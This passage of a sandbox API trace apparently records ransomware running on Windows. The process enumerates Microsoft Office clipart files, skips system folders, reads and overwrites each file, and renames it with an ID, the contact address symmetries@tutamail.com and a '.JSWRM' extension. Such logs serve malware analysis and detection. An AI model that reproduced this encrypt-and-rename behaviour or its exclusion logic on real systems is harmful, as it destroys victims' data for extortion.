hHeap=0x1e0000) returned 1 [0076.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.206] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00705_.WMF", cAlternateFileName="")) returned 1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2=".") returned 1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="..") returned 1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="...") returned 1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="windows") returned -1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="recovery") returned -1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="perflogs") returned -1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="documents and settings") returned -1 [0076.206] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.207] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="system volume information") returned -1 [0076.207] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="msocache") returned -1 [0076.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0076.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00705_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00705_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00705_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0076.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0076.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00705_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00705_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00705_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0076.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.207] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24588) returned 1 [0076.207] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6000) returned 0x24c1d0 [0076.207] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x6000, lpOverlapped=0x0) returned 1 [0076.211] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.211] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x6000, lpOverlapped=0x0) returned 1 [0076.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.211] CloseHandle (hObject=0x460) returned 1 [0076.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0076.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0076.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0076.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0076.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0076.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0076.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.212] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01015_.WMF", cAlternateFileName="")) returned 1 [0076.212] lstrcmpiW (lpString1="DD01015_.WMF", lpString2=".") returned 1 [0076.212] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="..") returned 1 [0076.212] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="...") returned 1 [0076.212] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="windows") returned -1 [0076.212] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="recovery") returned -1 [0076.212] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="perflogs") returned -1 [0076.213] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="documents and settings") returned -1 [0076.213] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.213] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="system volume information") returned -1 [0076.213] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="msocache") returned -1 [0076.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0076.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01015_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01015_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01015_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0076.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01015_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01015_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01015_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.213] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2226) returned 1 [0076.213] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b0) returned 0x23fc98 [0076.213] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0076.215] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.215] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0076.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.215] CloseHandle (hObject=0x460) returned 1 [0076.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0076.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0076.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0076.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0076.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0076.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0076.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.217] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01039_.WMF", cAlternateFileName="")) returned 1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2=".") returned 1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="..") returned 1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="...") returned 1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="windows") returned -1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="recovery") returned -1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="perflogs") returned -1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="documents and settings") returned -1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="system volume information") returned -1 [0076.217] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="msocache") returned -1 [0076.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0076.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01039_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01039_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01039_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0076.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0076.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01039_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01039_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01039_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0076.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.218] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14820) returned 1 [0076.218] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x39e0) returned 0x24c1d0 [0076.218] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x39e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x39e0, lpOverlapped=0x0) returned 1 [0076.241] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.241] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x39e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x39e0, lpOverlapped=0x0) returned 1 [0076.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.241] CloseHandle (hObject=0x460) returned 1 [0076.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0076.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0076.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0076.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0076.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0076.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0076.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.242] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01138_.WMF", cAlternateFileName="")) returned 1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2=".") returned 1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="..") returned 1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="...") returned 1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="windows") returned -1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="recovery") returned -1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="perflogs") returned -1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="documents and settings") returned -1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.243] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="system volume information") returned -1 [0076.244] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="msocache") returned -1 [0076.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0076.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01138_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01138_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 